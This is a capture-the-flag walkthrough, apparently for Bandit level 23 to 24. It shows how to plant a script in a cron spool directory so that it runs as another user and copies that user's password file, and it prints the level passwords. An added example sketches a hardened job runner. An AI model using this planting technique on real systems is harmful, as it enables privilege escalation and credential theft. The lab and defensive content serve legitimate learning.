Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
Solution
Password: jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
```
$ ssh [email protected] -p 2220
```
Again, let’s check out cron.
```
[email protected]:~$ ls /etc/cron.d/
cronjob_bandit22  cronjob_bandit23  cronjob_bandit24  popularity-contest
[email protected]:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
```
Nothing too surprising. Yet another script.
```
[email protected]:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        timeout -s 9 60 ./$i
        rm -f ./$i
    fi
done
```
Let’s examine this script.
- Set a variable called myname based on the user who runs it (in this case, it’ll be bandit24)
- Change to a directory (/var/spool/bandit24)
- Output some debugging information
- Loop through all files in the directory
- Skip the special directory entries . and ..
- Otherwise, execute the file, killing it with signal 9 (SIGKILL) if it is still running after 60 seconds
- Delete the file
So we can run commands as bandit24 if we put a shell script in /var/spool/bandit24. We know that in this wargame a user can read their own password file. So we can have our script read the file for us.
The cron job redirects its output to /dev/null, so our script should save the password to a file instead. I doubt that bandit24 can write to bandit23’s home directory, so let’s create a directory in /tmp.
```
[email protected]:~$ mkdir /tmp/output_dir
[email protected]:~$ cd /tmp/output_dir
```
Now we need to write a script to output a file to that directory.
Here’s a simple script to do that.
```
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/output_dir/password
```
I’m gonna use vi to create get_pass.sh.
```
[email protected]:/tmp/output_dir$ vi get_pass.sh
```
Press i (insert) to activate writing mode. You can now copy + paste the script into the file. Press Esc to exit writing mode, then press Shift + z twice (ZZ) to save and exit.
```
[email protected]:/tmp/output_dir$ cat get_pass.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/output_dir/password
```
Let’s make it executable by all users.
```
[email protected]:/tmp/output_dir$ chmod a+x get_pass.sh
```
We also need to let bandit24 write to our directory; the simplest way is to make it writable by all users.
```
[email protected]:/tmp/output_dir$ chmod a+w .
```
Now, let’s copy it to the directory the cronjob executes from.
```
[email protected]:/tmp/output_dir$ cp get_pass.sh /var/spool/bandit24/
```
When the next minute ticks over, we should get a file called password in our directory.
```
[email protected]:/tmp/output_dir$ ls
get_pass.sh  password
[email protected]:/tmp/output_dir$ cat password
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
```
Got’em.
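
The level works because the cron script runs, as bandit24, any file another user can copy into /var/spool/bandit24. As an added example (not the wargame's script and not part of the original walkthrough), here is a hardened runner that executes a spool entry only when both the directory and the file are owned by the expected user and carry no group/other write bit. The function names are hypothetical, and GNU stat and timeout are assumed.

```bash
#!/bin/bash
# Added example, not the wargame's script. Function names are hypothetical;
# GNU stat and timeout are assumed.

# no_foreign_write PATH OWNER: PATH is owned by OWNER and has no group/other
# write bit (octal mask 022).
no_foreign_write() {
    [ "$(stat -c %U "$1")" = "$2" ] || return 1
    [ $(( 0$(stat -c %a "$1") & 022 )) -eq 0 ]
}

# safe_to_run FILE OWNER: a regular file, not a symlink, that passes the check.
safe_to_run() {
    [ -f "$1" ] && [ ! -L "$1" ] && no_foreign_write "$1" "$2"
}

# run_spool DIR OWNER: prints "run NAME" or "skip NAME" for each entry and
# deletes it either way. Returns 2, touching nothing, if DIR itself is unsafe.
run_spool() {
    local dir=$1 owner=$2 f
    if [ ! -d "$dir" ] || [ -L "$dir" ] || ! no_foreign_write "$dir" "$owner"; then
        echo "refusing $dir: not owned by $owner or writable by others" >&2
        return 2
    fi
    for f in "$dir"/* "$dir"/.[!.]*; do
        [ -e "$f" ] || [ -L "$f" ] || continue   # glob matched nothing
        if safe_to_run "$f" "$owner"; then
            echo "run ${f##*/}"
            # Same limit as the original job: SIGKILL after 60 seconds.
            timeout -s 9 60 "$f" >/dev/null 2>&1 || true
        else
            echo "skip ${f##*/}"
        fi
        rm -f -- "$f"
    done
}

# Intended call from the cron script (paths as on the page):
#   run_spool "/var/spool/$(whoami)" "$(whoami)"
```

The directory check stops other users from planting files at all; the per-file check catches entries whose contents someone else could still modify.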